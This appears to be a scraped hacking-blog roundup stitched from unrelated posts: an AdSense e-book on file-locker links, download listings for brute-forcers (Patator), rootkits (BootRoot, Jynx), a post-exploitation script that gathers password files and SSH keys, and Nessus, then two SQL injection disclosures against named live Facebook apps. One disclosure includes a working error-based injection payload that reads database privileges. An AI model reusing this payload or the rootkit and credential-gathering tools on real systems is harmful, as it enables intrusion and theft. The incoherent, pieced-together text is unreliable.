*How to Claim Your Share of The Multi-Billion Dollar AdSense Pie
*Ways to Build An Adsense Ready Website Without a Domain or Hosting
*Secrets to Tweaking and Optimizing your Ads for Maximum Revenue
*How to use Google's Custom Search engine to Catch Fickle Visitors
*Special Code to Influence Your Ads with Section Targeting and Keywords
*How to Understand your AdSense Stats, Channels and Split Testing


Download PDF
http://depositfiles.com/files/rq4xjhc37
http://www.filesonic.com/file/958307384/G00gle_adsen5.rar

by
Amarjit Singh

SecToolMarket currently supports the following features:

1- A clear and simple presentation of the 2011 benchmark of 60 web application scanners, with a "click to get anywhere" interface.
2- Product specific, Test specific and Vendor specific unified information.
3- Comparison tables for product information, general features, authentication features, input vector support (new!), coverage (new!), audit features and complimentary audit features (data reflects the results published in the *08/2011* benchmark).
4- Detailed comparison of SQL Injection and Reflected Cross Site Scripting detection accuracy (data reflects the results published in the *08/2011* benchmark).
5- Glossaries for many of the terms & features implemented in the various products.
6- Statistics for many of the benchmark's results (how many scanners support a certain feature, implement a certain vulnerability check, etc).
7- Built-in filters for comparing unified lists of products, commercial products or open source products.
8- Additional content that wasn't published in the 2011 benchmark.
9- Notifications on SVN activities and upcoming features.
10- A framework for presenting updated & new results more frequently.

Notice that the information that is currently presented in the website reflects information from august 2011, and that the two new benchmark categories (input vector support and coverage) still require modifications and updates, but according to the author, this information will be updated more often, and will enable us to track the research progress.

Info
http://www.sectoolmarket.com/

Jean-Pierre aka DarkCoderSc and Fred De Vries Develop and Release the second version of Another great security tool named "Mirage Anti-Bot 2.0". Zeus and SpyEye were the two main families of botnet software. These types of malware are spread mainly through drive-by downloads and phishing schemes.

Download
http://unremote.org/downloads/Mirage2/Setup.exe

Patator is a multi-purpose brute-forcer, with a modular design and a flexible usage.

Currently it supports the following modules:
* ftp_login : Brute-force FTP
* ssh_login : Brute-force SSH
* telnet_login : Brute-force Telnet
* smtp_login : Brute-force SMTP
* smtp_vrfy : Enumerate valid users using the SMTP VRFY command
* smtp_rcpt : Enumerate valid users using the SMTP RCPT TO command
* http_fuzz : Brute-force HTTP/HTTPS
* pop_passd : Brute-force poppassd (not POP3)
* ldap_login : Brute-force LDAP
* smb_login : Brute-force SMB
* mssql_login : Brute-force MSSQL
* oracle_login : Brute-force Oracle
* mysql_login : Brute-force MySQL
* pgsql_login : Brute-force PostgreSQL
* vnc_login : Brute-force VNC
* dns_forward : Forward lookup subdomains
* dns_reverse : Reverse lookup subnets
* snmp_login : Brute-force SNMPv1/2 and SNMPv3
* unzip_pass : Brute-force the password of encrypted ZIP files
* keystore_pass : Brute-force the password of Java keystore files

Download
http://code.google.com/p/patator/downloads/list

This small tool is public and accessible to you for use however you please. It may help other auditors or penetration testers do their job faster, Here is a little demonstration. After downloading the script (in python), you simply type:

> python DPScan.py [website url]

Download
https://github.com/Rorchackh/Blue-Sky-Information-Security/blob/master/DPScan.py

At the core of the term "rootkit" are two words- "root" and "kit". Root refers to the all-powerful, "Administrator" account on Unix and Linux systems, and kit refers to a set of programs or utilities that allow someone to maintain root-level access to a computer. However, one other aspect of a rootkit, beyond maintaining root-level access, is that the presence of the rootkit should be undetectable.

Dowload BootRoot
http://www.eeye.com/Resources/Security-Center/Research/Tools/BootRoot

Download Jynx
http://www.blackhatacademy.org/security101/index.php?title=Jynx

Intersect 2.0 is a Python script written to perform automated Post-Exploitation information gathering and reporting.
The general idea is that after you have exploited a target, you run this script and it performs a variety of tasks
that you would normally need to perform manually. Intersect will collect password files, copy SSH keys, enumerate
processes and installed applications, gather detailed network information, map the hosts internal network (for pivoting),
locate and identify common anti-virus and firewall applications and much more.

Download
https://github.com/ohdae/Intersect-2.0/

For more information or to register, head over to here: http://blackhat.com/html/bh-us-12/training/courses/bh-us-12-training_social_engineer_toolkit.html. You’ll also get a free Teensy device that we’ll be programming during the class! If you are a penetration tester, or wanting to get into it.. This is your course. Learn how to write your own modules, customize your own attacks, build your attack off your company and have a high level of success.

Info
http://www.secmaniac.com/blog/2012/02/15/blackhat-training-on-the-social-engineer-toolkit/

The Nessus vulnerability scanner is available as a stand-alone network scanner, as a subscription service or as a closely integrated scanning component of SecurityCenter.

Download
http://www.nessus.org/products/nessus/nessus-download-agreement

FAQ
http://www.nessus.org/products/nessus/nessus-faq

Details:
========
A remote SQL Injection vulnerability is detected on the Facebook Life Smile
(apps.facebook).
The vulnerability allows an attacker (remote) to inject/execute own sql
statements on the affected fb application dbms.

Vulnerable Module(s):
[+] Life Smile - Facebook 3rd Party
Application

Vulnerable Param(s)/File(s):
[+] index.php

Affected Application:
[+] apps.facebook.com/viewmycalendar/

Sql Error
Example:

http://[APP-SERVER]/[SERVICE-APP]/[FILE].[PHP]?=[SQL Injection]

PoC:

http://apps.facebook.com/viewmycalendar/index.php?page=[SQL-Injection]

Real World Demo :

http://apps.facebook.com/viewmycalendar/index.php?page=1'

----------------------------------------------------------------------

Details:
========
A remote SQL Injection vulnerability is detected on the Facebook Life Smile
(apps.facebook).
The vulnerability allows an attacker (remote) to inject/execute own sql
statements on the affected fb application dbms.

Vulnerable Module(s):
[+] Life Smile - Facebook 3rd Party
Application

Vulnerable Param(s)/File(s):
[+] index.php

Affected Application:
[+] apps.facebook.com/lifesmile/

Sql Error
Example:

http://[APP-SERVER]/[SERVICE-APP]/[FILE].[PHP]?=[SQL Injection]

PoC:

http://apps.facebook.com/lifesmile/index.php?page=[SQL-Injection]

Real World Demo :

http://apps.facebook.com/lifesmile/index.php?page=210 AND (SELECT 1793
FROM(SELECT COUNT(*),CONCAT(0x3a626a7a3a,(SELECT
MID((IFNULL(CAST(privilege_type AS CHAR),0x20)),1,50) FROM
INFORMATION_SCHEMA.USER_PRIVILEGES LIMIT
0,1),0x3a7672703a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS
GROUP BY x)a)


by
Ninja-Sec

Requirements
Requires Android Market and Google account:
No
Requires third-party libraries:
No
Requires 'rooted' device:
No
Target Android version:
Android 3.2
Minimum Android version:
Android 1.6
Minimum screen width:
240 dpx

Download
http://slideme.org/mobileapp/download/1a3dc792-55a7-11e1-a703-00505690390e.apk